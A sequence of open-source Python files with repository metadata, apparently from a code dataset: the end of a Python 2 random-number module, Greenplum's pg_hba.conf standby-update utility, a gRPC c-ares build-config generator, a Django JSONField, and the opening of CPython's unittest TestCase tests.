theta = (mu - _acos(f)) % TWOPI
return theta
## -------------------- gamma distribution --------------------
def gammavariate(self, alpha, beta):
"""Gamma distribution. Not the gamma function!
Conditions on the parameters are alpha > 0 and beta > 0.
The probability distribution function is:
x ** (alpha - 1) * math.exp(-x / beta)
pdf(x) = --------------------------------------
math.gamma(alpha) * beta ** alpha
"""
# alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2
# Warning: a few older sources define the gamma distribution in terms
# of alpha > -1.0
if alpha <= 0.0 or beta <= 0.0:
raise ValueError, 'gammavariate: alpha and beta must be > 0.0'
random = self.random
if alpha > 1.0:
# Uses R.C.H. Cheng, "The generation of Gamma
# variables with non-integral shape parameters",
# Applied Statistics, (1977), 26, No. 1, p71-74
ainv = _sqrt(2.0 * alpha - 1.0)
bbb = alpha - LOG4
ccc = alpha + ainv
while 1:
u1 = random()
if not 1e-7 < u1 < .9999999:
continue
u2 = 1.0 - random()
v = _log(u1/(1.0-u1))/ainv
x = alpha*_exp(v)
z = u1*u1*u2
r = bbb+ccc*v-x
if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
return x * beta
elif alpha == 1.0:
# expovariate(1)
u = random()
while u <= 1e-7:
u = random()
return -_log(u) * beta
else: # alpha is between 0 and 1 (exclusive)
# Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle
while 1:
u = random()
b = (_e + alpha)/_e
p = b*u
if p <= 1.0:
x = p ** (1.0/alpha)
else:
x = -_log((b-p)/alpha)
u1 = random()
if p > 1.0:
if u1 <= x ** (alpha - 1.0):
break
elif u1 <= _exp(-x):
break
return x * beta
## -------------------- Gauss (faster alternative) --------------------
def gauss(self, mu, sigma):
"""Gaussian distribution.
mu is the mean, and sigma is the standard deviation. This is
slightly faster than the normalvariate() function.
Not thread-safe without a lock around calls.
"""
# When x and y are two variables from [0, 1), uniformly
# distributed, then
#
# cos(2*pi*x)*sqrt(-2*log(1-y))
# sin(2*pi*x)*sqrt(-2*log(1-y))
#
# are two *independent* variables with normal distribution
# (mu = 0, sigma = 1).
# (Lambert Meertens)
# (corrected version; bug discovered by Mike Miller, fixed by LM)
# Multithreading note: When two threads call this function
# simultaneously, it is possible that they will receive the
# same return value. The window is very small though. To
# avoid this, you have to use a lock around all calls. (I
# didn't want to slow this down in the serial case by using a
# lock here.)
random = self.random
z = self.gauss_next
self.gauss_next = None
if z is None:
x2pi = random() * TWOPI
g2rad = _sqrt(-2.0 * _log(1.0 - random()))
z = _cos(x2pi) * g2rad
self.gauss_next = _sin(x2pi) * g2rad
return mu + z*sigma
## -------------------- beta --------------------
## See
## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
## for Ivan Frohne's insightful analysis of why the original implementation:
##
## def betavariate(self, alpha, beta):
## # Discrete Event Simulation in C, pp 87-88.
##
## y = self.expovariate(alpha)
## z = self.expovariate(1.0/beta)
## return z/(y+z)
##
## was dead wrong, and how it probably got that way.
def betavariate(self, alpha, beta):
"""Beta distribution.
Conditions on the parameters are alpha > 0 and beta > 0.
Returned values range between 0 and 1.
"""
# This version due to Janne Sinkkonen, and matches all the std
# texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
y = self.gammavariate(alpha, 1.)
if y == 0:
return 0.0
else:
return y / (y + self.gammavariate(beta, 1.))
## -------------------- Pareto --------------------
def paretovariate(self, alpha):
"""Pareto distribution. alpha is the shape parameter."""
# Jain, pg. 495
u = 1.0 - self.random()
return 1.0 / pow(u, 1.0/alpha)
## -------------------- Weibull --------------------
def weibullvariate(self, alpha, beta):
"""Weibull distribution.
alpha is the scale parameter and beta is the shape parameter.
"""
# Jain, pg. 499; bug fix courtesy Bill Arms
u = 1.0 - self.random()
return alpha * pow(-_log(u), 1.0/beta)
## -------------------- Wichmann-Hill -------------------
class WichmannHill(Random):
VERSION = 1 # used by getstate/setstate
def seed(self, a=None):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
If a is not None or an int or long, hash(a) is used instead.
If a is an int or long, a is used directly. Distinct values between
0 and 27814431486575L inclusive are guaranteed to yield distinct
internal states (this guarantee is specific to the default
Wichmann-Hill generator).
"""
if a is None:
try:
a = long(_hexlify(_urandom(16)), 16)
except NotImplementedError:
import time
a = long(time.time() * 256) # use fractional seconds
if not isinstance(a, (int, long)):
a = hash(a)
a, x = divmod(a, 30268)
a, y = divmod(a, 30306)
a, z = divmod(a, 30322)
self._seed = int(x)+1, int(y)+1, int(z)+1
self.gauss_next = None
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
# Wichman-Hill random number generator.
#
# Wichmann, B. A. & Hill, I. D. (1982)
# Algorithm AS 183:
# An efficient and portable pseudo-random number generator
# Applied Statistics 31 (1982) 188-190
#
# see also:
# Correction to Algorithm AS 183
# Applied Statistics 33 (1984) 123
#
# McLeod, A. I. (1985)
# A remark on Algorithm AS 183
# Applied Statistics 34 (1985),198-200
# This part is thread-unsafe:
# BEGIN CRITICAL SECTION
x, y, z = self._seed
x = (171 * x) % 30269
y = (172 * y) % 30307
z = (170 * z) % 30323
self._seed = x, y, z
# END CRITICAL SECTION
# Note: on a platform using IEEE-754 double arithmetic, this can
# never return 0.0 (asserted by Tim; proof too long for a comment).
return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self.VERSION, self._seed, self.gauss_next
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
version = state[0]
if version == 1:
version, self._seed, self.gauss_next = state
else:
raise ValueError("state with version %s passed to "
"Random.setstate() of version %s" %
(version, self.VERSION))
def jumpahead(self, n):
"""Act as if n calls to random() were made, but quickly.
n is an int, greater than or equal to 0.
Example use: If you have 2 threads and know that each will
consume no more than a million random numbers, create two Random
objects r1 and r2, then do
r2.setstate(r1.getstate())
r2.jumpahead(1000000)
Then r1 and r2 will use guaranteed-disjoint segments of the full
period.
"""
if not n >= 0:
raise ValueError("n must be >= 0")
x, y, z = self._seed
x = int(x * pow(171, n, 30269)) % 30269
y = int(y * pow(172, n, 30307)) % 30307
z = int(z * pow(170, n, 30323)) % 30323
self._seed = x, y, z
def __whseed(self, x=0, y=0, z=0):
"""Set the Wichmann-Hill seed from (x, y, z).
These must be integers in the range [0, 256).
"""
if not type(x) == type(y) == type(z) == int:
raise TypeError('seeds must be integers')
if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256):
raise ValueError('seeds must be in range(0, 256)')
if 0 == x == y == z:
# Initialize from current time
import time
t = long(time.time() * 256)
t = int((t&0xffffff) ^ (t>>24))
t, x = divmod(t, 256)
t, y = divmod(t, 256)
t, z = divmod(t, 256)
# Zero is a poor seed, so substitute 1
self._seed = (x or 1, y or 1, z or 1)
self.gauss_next = None
def whseed(self, a=None):
"""Seed from hashable object's hash code.
None or no argument seeds from current time. It is not guaranteed
that objects with distinct hash codes lead to distinct internal
states.
This is obsolete, provided for compatibility with the seed routine
used prior to Python 2.1. Use the .seed() method instead.
"""
if a is None:
self.__whseed()
return
a = hash(a)
a, x = divmod(a, 256)
a, y = divmod(a, 256)
a, z = divmod(a, 256)
x = (x + a) % 256 or 1
y = (y + a) % 256 or 1
z = (z + a) % 256 or 1
self.__whseed(x, y, z)
## --------------- Operating System Random Source ------------------
class SystemRandom(Random):
"""Alternate random number generator using sources provided
by the operating system (such as /dev/urandom on Unix or
CryptGenRandom on Windows).
Not available on all systems (see os.urandom() for details).
"""
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF
def getrandbits(self, k):
"""getrandbits(k) -> x. Generates a long int with k random bits."""
if k <= 0:
raise ValueError('number of bits must be greater than zero')
if k != int(k):
raise TypeError('number of bits should be an integer')
bytes = (k + 7) // 8 # bits / 8 and rounded up
x = long(_hexlify(_urandom(bytes)), 16)
return x >> (bytes * 8 - k) # trim excess bits
def _stub(self, *args, **kwds):
"Stub method. Not used for a system random number generator."
return None
seed = jumpahead = _stub
def _notimplemented(self, *args, **kwds):
"Method should not be called for a system random number generator."
raise NotImplementedError('System entropy source does not have state.')
getstate = setstate = _notimplemented
## -------------------- test program --------------------
def _test_generator(n, func, args):
import time
print n, 'times', func.__name__
total = 0.0
sqsum = 0.0
smallest = 1e10
largest = -1e10
t0 = time.time()
for i in range(n):
x = func(*args)
total += x
sqsum = sqsum + x*x
smallest = min(x, smallest)
largest = max(x, largest)
t1 = time.time()
print round(t1-t0, 3), 'sec,',
avg = total/n
stddev = _sqrt(sqsum/n - avg*avg)
print 'avg %g, stddev %g, min %g, max %g' % \
(avg, stddev, smallest, largest)
def _test(N=2000):
_test_generator(N, random, ())
_test_generator(N, normalvariate, (0.0, 1.0))
_test_generator(N, lognormvariate, (0.0, 1.0))
_test_generator(N, vonmisesvariate, (0.0, 1.0))
_test_generator(N, gammavariate, (0.01, 1.0))
_test_generator(N, gammavariate, (0.1, 1.0))
_test_generator(N, gammavariate, (0.1, 2.0))
_test_generator(N, gammavariate, (0.5, 1.0))
_test_generator(N, gammavariate, (0.9, 1.0))
_test_generator(N, gammavariate, (1.0, 1.0))
_test_generator(N, gammavariate, (2.0, 1.0))
_test_generator(N, gammavariate, (20.0, 1.0))
_test_generator(N, gammavariate, (200.0, 1.0))
_test_generator(N, gauss, (0.0, 1.0))
_test_generator(N, betavariate, (3.0, 3.0))
_test_generator(N, triangular, (0.0, 1.0, 1.0/3.0))
# Create one instance, seeded from current time, and export its methods
# as module-level functions. The functions share state across all uses
#(both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.
_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
jumpahead = _inst.jumpahead
getrandbits = _inst.getrandbits
if __name__ == '__main__':
_test()
| gpl-3.0 |
zaksoup/gpdb | gpMgmt/bin/gppylib/operations/initstandby.py | 35 | 9596 | #!/usr/bin/env python
import os
import base64
import pickle
from gppylib.gpparseopts import OptParser, OptChecker
from gppylib.mainUtils import addStandardLoggingAndHelpOptions
from collections import defaultdict
from gppylib import gplog
from gppylib.commands import unix
from gppylib.commands.base import REMOTE, WorkerPool, Command
from gppylib.mainUtils import ExceptionNoStackTraceNeeded
from gppylib.operations import Operation
PG_HBA_BACKUP = 'pg_hba.conf.bak'
logger = gplog.get_default_logger()
DEFAULT_BATCH_SIZE = 16
def get_standby_pg_hba_info(standby_host):
standby_ips = unix.InterfaceAddrs.remote('get standby ips', standby_host)
current_user = unix.UserId.local('get userid')
new_section = ['# standby master host ip addresses\n']
for ip in standby_ips:
cidr_suffix = '/128' if ':' in ip else '/32' # MPP-15889
new_section.append('host\tall\t%s\t%s%s\ttrust\n' % (current_user, ip, cidr_suffix))
standby_pg_hba_info = ''.join(new_section)
return standby_pg_hba_info
def cleanup_pg_hba_backup(data_dirs_list):
"""
cleanup the backup of pg_hba.config created on segments
"""
try:
for data_dir in data_dirs_list:
backup_file = os.path.join(data_dir, PG_HBA_BACKUP)
logger.info('Removing pg_hba.conf backup file %s' % backup_file)
if os.path.exists(backup_file):
os.remove(backup_file)
except Exception, ex:
logger.error('Unable to cleanup backup of pg_hba.conf %s' % ex)
def cleanup_pg_hba_backup_on_segment(gparr):
"""
Cleanup the pg_hba.conf on all of the segments
present in the array
"""
logger.debug('Removing pg_hba.conf backup file on segments...')
host_to_seg_map = defaultdict(list)
for seg in gparr.getDbList():
if not seg.isSegmentMaster() and not seg.isSegmentStandby():
host_to_seg_map[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())
pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
try:
for host, data_dirs_list in host_to_seg_map.items():
pickled_data_dirs_list = base64.urlsafe_b64encode(pickle.dumps(data_dirs_list))
cmdStr = "$GPHOME/lib/python/gppylib/operations/initstandby.py -d %s -D" % pickled_data_dirs_list
cmd = Command('Cleanup the pg_hba.conf backups on remote hosts', cmdStr=cmdStr , ctxt=REMOTE, remoteHost=host)
pool.addCommand(cmd)
pool.join()
for item in pool.getCompletedItems():
result = item.get_results()
if result.rc != 0:
logger.error('Unable to cleanup pg_hba.conf backup file %s' % str(result.stderr))
logger.error('Please check the segment for more details')
finally:
pool.haltWork()
pool.joinWorkers()
pool = None
def restore_pg_hba(data_dirs_list):
for data_dir in data_dirs_list:
logger.info('Restoring pg_hba.conf for %s' % data_dir)
os.system('mv %s/%s %s/pg_hba.conf' % (data_dir, PG_HBA_BACKUP, data_dir))
def restore_pg_hba_on_segment(gparr):
"""
Restore the pg_hba.conf on all of the segments
present in the array
"""
logger.debug('Restoring pg_hba.conf file on segments...')
host_to_seg_map = defaultdict(list)
for seg in gparr.getDbList():
if not seg.isSegmentMaster() and not seg.isSegmentStandby():
host_to_seg_map[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())
pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
try:
for host, data_dirs_list in host_to_seg_map.items():
pickled_data_dirs_list = base64.urlsafe_b64encode(pickle.dumps(data_dirs_list))
cmdStr = "$GPHOME/lib/python/gppylib/operations/initstandby.py -d %s -r" % pickled_data_dirs_list
cmd = Command('Restore the pg_hba.conf on remote hosts', cmdStr=cmdStr , ctxt=REMOTE, remoteHost=host)
pool.addCommand(cmd)
pool.join()
for item in pool.getCompletedItems():
result = item.get_results()
if result.rc != 0:
logger.error('Unable to restore pg_hba.conf %s' % str(result.stderr))
logger.error('Please check the segment for more details')
finally:
pool.haltWork()
pool.joinWorkers()
pool = None
def backup_pg_hba(data_dirs_list):
try:
for data_dir in data_dirs_list:
logger.info('Backing up pg_hba.conf for %s' % data_dir)
# back it up
os.system('cp %s/pg_hba.conf %s/%s'% (data_dir, data_dir, PG_HBA_BACKUP))
except Exception, ex:
raise Exception('Failed to backup pg_hba.config file %s' % ex)
def backup_pg_hba_on_segment(gparr):
"""
Backup the pg_hba.conf on all of the segments
present in the array
"""
logger.info('Backing up pg_hba.conf file on segments...')
host_to_seg_map = defaultdict(list)
for seg in gparr.getDbList():
if not seg.isSegmentMaster() and not seg.isSegmentStandby():
host_to_seg_map[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())
pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
try:
for host, data_dirs_list in host_to_seg_map.items():
pickled_data_dirs_list = base64.urlsafe_b64encode(pickle.dumps(data_dirs_list))
cmdStr = "$GPHOME/lib/python/gppylib/operations/initstandby.py -d %s -b" % pickled_data_dirs_list
cmd = Command('Backup the pg_hba.conf on remote hosts', cmdStr=cmdStr , ctxt=REMOTE, remoteHost=host)
pool.addCommand(cmd)
pool.join()
for item in pool.getCompletedItems():
result = item.get_results()
if result.rc != 0:
logger.error('Unable to backup pg_hba.conf %s' % str(result.stderr))
logger.error('Please check the segment for more details')
finally:
pool.haltWork()
pool.joinWorkers()
pool = None
def update_pg_hba(standby_pg_hba_info, data_dirs_list):
backup_pg_hba(data_dirs_list)
pg_hba_content_list = []
for data_dir in data_dirs_list:
logger.info('Updating pg_hba.conf for %s' % data_dir)
with open('%s/pg_hba.conf' % data_dir) as fp:
pg_hba_contents = fp.read()
if standby_pg_hba_info in pg_hba_contents:
continue
else:
pg_hba_contents += standby_pg_hba_info
with open('%s/pg_hba.conf' % data_dir, 'w') as fp:
fp.write(pg_hba_contents)
pg_hba_content_list.append(pg_hba_contents)
return pg_hba_content_list
def update_pg_hba_conf_on_segments(gparr, standby_host):
"""
Updates the pg_hba.conf on all of the segments
present in the array
"""
logger.debug('Updating pg_hba.conf file on segments...')
standby_pg_hba_info = get_standby_pg_hba_info(standby_host)
pickled_standby_pg_hba_info = base64.urlsafe_b64encode(pickle.dumps(standby_pg_hba_info))
host_to_seg_map = defaultdict(list)
for seg in gparr.getDbList():
if not seg.isSegmentMaster() and not seg.isSegmentStandby():
host_to_seg_map[seg.getSegmentHostName()].append(seg.getSegmentDataDirectory())
pool = WorkerPool(numWorkers=DEFAULT_BATCH_SIZE)
try:
for host, data_dirs_list in host_to_seg_map.items():
pickled_data_dirs_list = base64.urlsafe_b64encode(pickle.dumps(data_dirs_list))
cmdStr = "$GPHOME/lib/python/gppylib/operations/initstandby.py -p %s -d %s" % (pickled_standby_pg_hba_info, pickled_data_dirs_list)
cmd = Command('Update the pg_hba.conf on remote hosts', cmdStr=cmdStr , ctxt=REMOTE, remoteHost=host)
pool.addCommand(cmd)
pool.join()
for item in pool.getCompletedItems():
result = item.get_results()
if result.rc != 0:
logger.error('Unable to update pg_hba.conf %s' % str(result.stderr))
logger.error('Please check the segment log file for more details')
finally:
pool.haltWork()
pool.joinWorkers()
pool = None
def create_parser():
parser = OptParser(option_class=OptChecker,
description='update the pg_hba.conf on all segments')
addStandardLoggingAndHelpOptions(parser, includeNonInteractiveOption=True)
parser.add_option('-p', '--pg-hba-info', dest='pg_hba_info', metavar='<pg_hba entries>',
help='Entries that get added to pg_hba.conf file')
parser.add_option('-d', '--data-dirs', dest='data_dirs', metavar='<list of data dirs>',
help='A list of all data directories present on this host')
parser.add_option('-b', '--backup', action='store_true',
help='Backup the pg_hba.conf file')
parser.add_option('-r', '--restore', action='store_true',
help='Restore the pg_hba.conf file')
parser.add_option('-D', '--delete', action='store_true',
help='Cleanup the pg_hba.conf backup file')
return parser
if __name__ == '__main__':
parser = create_parser()
(options, args) = parser.parse_args()
data_dirs = pickle.loads(base64.urlsafe_b64decode(options.data_dirs))
if options.pg_hba_info:
pg_hba_info = pickle.loads(base64.urlsafe_b64decode(options.pg_hba_info))
update_pg_hba(pg_hba_info, data_dirs)
elif options.backup:
backup_pg_hba(data_dirs)
elif options.restore:
restore_pg_hba(data_dirs)
else:
cleanup_pg_hba_backup(data_dirs)
| apache-2.0 |
fuchsia-mirror/third_party-grpc | src/c-ares/gen_build_yaml.py | 18 | 5765 | #!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import os
import sys
import yaml
os.chdir(os.path.dirname(sys.argv[0])+'/../..')
out = {}
try:
def gen_ares_build(x):
subprocess.call("third_party/cares/cares/buildconf", shell=True)
subprocess.call("third_party/cares/cares/configure", shell=True)
def config_platform(x):
if 'darwin' in sys.platform:
return 'src/cares/cares/config_darwin/ares_config.h'
if 'freebsd' in sys.platform:
return 'src/cares/cares/config_freebsd/ares_config.h'
if 'linux' in sys.platform:
return 'src/cares/cares/config_linux/ares_config.h'
if 'openbsd' in sys.platform:
return 'src/cares/cares/config_openbsd/ares_config.h'
if not os.path.isfile('third_party/cares/cares/ares_config.h'):
gen_ares_build(x)
return 'third_party/cares/cares/ares_config.h'
def ares_build(x):
if os.path.isfile('src/cares/cares/ares_build.h'):
return 'src/cares/cares/ares_build.h'
if not os.path.isfile('third_party/cares/cares/ares_build.h'):
gen_ares_build(x)
return 'third_party/cares/cares/ares_build.h'
out['libs'] = [{
'name': 'ares',
'defaults': 'ares',
'build': 'private',
'language': 'c',
'secure': 'no',
'src': [
"third_party/cares/cares/ares__close_sockets.c",
"third_party/cares/cares/ares__get_hostent.c",
"third_party/cares/cares/ares__read_line.c",
"third_party/cares/cares/ares__timeval.c",
"third_party/cares/cares/ares_cancel.c",
"third_party/cares/cares/ares_create_query.c",
"third_party/cares/cares/ares_data.c",
"third_party/cares/cares/ares_destroy.c",
"third_party/cares/cares/ares_expand_name.c",
"third_party/cares/cares/ares_expand_string.c",
"third_party/cares/cares/ares_fds.c",
"third_party/cares/cares/ares_free_hostent.c",
"third_party/cares/cares/ares_free_string.c",
"third_party/cares/cares/ares_getenv.c",
"third_party/cares/cares/ares_gethostbyaddr.c",
"third_party/cares/cares/ares_gethostbyname.c",
"third_party/cares/cares/ares_getnameinfo.c",
"third_party/cares/cares/ares_getopt.c",
"third_party/cares/cares/ares_getsock.c",
"third_party/cares/cares/ares_init.c",
"third_party/cares/cares/ares_library_init.c",
"third_party/cares/cares/ares_llist.c",
"third_party/cares/cares/ares_mkquery.c",
"third_party/cares/cares/ares_nowarn.c",
"third_party/cares/cares/ares_options.c",
"third_party/cares/cares/ares_parse_a_reply.c",
"third_party/cares/cares/ares_parse_aaaa_reply.c",
"third_party/cares/cares/ares_parse_mx_reply.c",
"third_party/cares/cares/ares_parse_naptr_reply.c",
"third_party/cares/cares/ares_parse_ns_reply.c",
"third_party/cares/cares/ares_parse_ptr_reply.c",
"third_party/cares/cares/ares_parse_soa_reply.c",
"third_party/cares/cares/ares_parse_srv_reply.c",
"third_party/cares/cares/ares_parse_txt_reply.c",
"third_party/cares/cares/ares_platform.c",
"third_party/cares/cares/ares_process.c",
"third_party/cares/cares/ares_query.c",
"third_party/cares/cares/ares_search.c",
"third_party/cares/cares/ares_send.c",
"third_party/cares/cares/ares_strcasecmp.c",
"third_party/cares/cares/ares_strdup.c",
"third_party/cares/cares/ares_strerror.c",
"third_party/cares/cares/ares_timeout.c",
"third_party/cares/cares/ares_version.c",
"third_party/cares/cares/ares_writev.c",
"third_party/cares/cares/bitncmp.c",
"third_party/cares/cares/inet_net_pton.c",
"third_party/cares/cares/inet_ntop.c",
"third_party/cares/cares/windows_port.c",
],
'headers': [
"third_party/cares/cares/ares.h",
"third_party/cares/cares/ares_data.h",
"third_party/cares/cares/ares_dns.h",
"third_party/cares/cares/ares_getenv.h",
"third_party/cares/cares/ares_getopt.h",
"third_party/cares/cares/ares_inet_net_pton.h",
"third_party/cares/cares/ares_iphlpapi.h",
"third_party/cares/cares/ares_ipv6.h",
"third_party/cares/cares/ares_library_init.h",
"third_party/cares/cares/ares_llist.h",
"third_party/cares/cares/ares_nowarn.h",
"third_party/cares/cares/ares_platform.h",
"third_party/cares/cares/ares_private.h",
"third_party/cares/cares/ares_rules.h",
"third_party/cares/cares/ares_setup.h",
"third_party/cares/cares/ares_strcasecmp.h",
"third_party/cares/cares/ares_strdup.h",
"third_party/cares/cares/ares_version.h",
"third_party/cares/cares/bitncmp.h",
"third_party/cares/cares/config-win32.h",
"third_party/cares/cares/setup_once.h",
"third_party/cares/ares_build.h",
"third_party/cares/config_darwin/ares_config.h",
"third_party/cares/config_freebsd/ares_config.h",
"third_party/cares/config_linux/ares_config.h",
"third_party/cares/config_openbsd/ares_config.h"
],
}]
except:
pass
print yaml.dump(out)
| apache-2.0 |
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/social/apps/django_app/default/fields.py | 80 | 2513 | import json
import six
from django.core.exceptions import ValidationError
from django.db import models
try:
from django.utils.encoding import smart_unicode as smart_text
smart_text # placate pyflakes
except ImportError:
from django.utils.encoding import smart_text
class JSONField(six.with_metaclass(models.SubfieldBase, models.TextField)):
"""Simple JSON field that stores python structures as JSON strings
on database.
"""
def __init__(self, *args, **kwargs):
kwargs.setdefault('default', '{}')
super(JSONField, self).__init__(*args, **kwargs)
def to_python(self, value):
"""
Convert the input JSON value into python structures, raises
django.core.exceptions.ValidationError if the data can't be converted.
"""
if self.blank and not value:
return {}
value = value or '{}'
if isinstance(value, six.binary_type):
value = six.text_type(value, 'utf-8')
if isinstance(value, six.string_types):
try:
# with django 1.6 i have '"{}"' as default value here
if value[0] == value[-1] == '"':
value = value[1:-1]
return json.loads(value)
except Exception as err:
raise ValidationError(str(err))
else:
return value
def validate(self, value, model_instance):
"""Check value is a valid JSON string, raise ValidationError on
error."""
if isinstance(value, six.string_types):
super(JSONField, self).validate(value, model_instance)
try:
json.loads(value)
except Exception as err:
raise ValidationError(str(err))
def get_prep_value(self, value):
"""Convert value to JSON string before save"""
try:
return json.dumps(value)
except Exception as err:
raise ValidationError(str(err))
def value_to_string(self, obj):
"""Return value from object converted to string properly"""
return smart_text(self.get_prep_value(self._get_val_from_obj(obj)))
def value_from_object(self, obj):
"""Return value dumped to string."""
return self.get_prep_value(self._get_val_from_obj(obj))
try:
from south.modelsinspector import add_introspection_rules
add_introspection_rules(
[],
["^social\.apps\.django_app\.default\.fields\.JSONField"]
)
except:
pass
| agpl-3.0 |
FireWRT/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/unittest/test/test_case.py | 8 | 62504 | import contextlib
import difflib
import pprint
import pickle
import re
import sys
import logging
import warnings
import weakref
import inspect
from copy import deepcopy
from test import support
import unittest
from unittest.test.support import (
TestEquality, TestHashing, LoggingResult, LegacyLoggingResult,
ResultWithNoStartTestRunStopTestRun
)
from test.support import captured_stderr
log_foo = logging.getLogger('foo')
log_foobar = logging.getLogger('foo.bar')
log_quux = logging.getLogger('quux')
class Test(object):
"Keep these TestCase classes out of the main namespace"
class Foo(unittest.TestCase):
def runTest(self): pass
def test1(self): pass
class Bar(Foo):
def test2(self): pass
class LoggingTestCase(unittest.TestCase):
"""A test case which logs its calls."""
def __init__(self, events):
super(Test.LoggingTestCase, self).__init__('test')
self.events = events
def setUp(self):
self.events.append('setUp')
def test(self):
self.events.append('test')
def tearDown(self):
self.events.append('tearDown')
class Test_TestCase(unittest.TestCase, TestEquality, TestHashing):
### Set up attributes used by inherited tests
################################################################
# Used by TestHashing.test_hash and TestEquality.test_eq
eq_pairs = [(Test.Foo('test1'), Test.Foo('test1'))]
# Used by TestEquality.test_ne
ne_pairs = [(Test.Foo('test1'), Test.Foo('runTest')),
(Test.Foo('test1'), Test.Bar('test1')),
(Test.Foo('test1'), Test.Bar('test2'))]
################################################################
### /Set up attributes used by inherited tests
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
# ...
# "methodName defaults to "runTest"."
#
# Make sure it really is optional, and that it defaults to the proper
# thing.
def test_init__no_test_name(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test().id()[-13:], '.Test.runTest')
# test that TestCase can be instantiated with no args
# primarily for use at the interactive interpreter
test = unittest.TestCase()
test.assertEqual(3, 3)
with test.assertRaises(test.failureException):
test.assertEqual(3, 2)
with self.assertRaises(AttributeError):
test.run()
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__valid(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test('test').id()[-10:], '.Test.test')
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__invalid(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
try:
Test('testfoo')
except ValueError:
pass
else:
self.fail("Failed to raise ValueError")
# "Return the number of tests represented by the this test object. For
# TestCase instances, this will always be 1"
def test_countTestCases(self):
class Foo(unittest.TestCase):
def test(self): pass
self.assertEqual(Foo('test').countTestCases(), 1)
# "Return the default type of test result object to be used to run this
# test. For TestCase instances, this will always be
# unittest.TestResult; subclasses of TestCase should
# override this as necessary."
def test_defaultTestResult(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
result = Foo().defaultTestResult()
self.assertEqual(type(result), unittest.TestResult)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'addError', 'stopTest']
self.assertEqual(events, expected)
# "With a temporary result stopTestRun is called when setUp errors.
def test_run_call_order__error_in_setUp_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'addError',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "With a default result, an error in the test still results in stopTestRun
# being called."
def test_run_call_order__error_in_test_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addError', 'stopTest', 'stopTestRun']
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
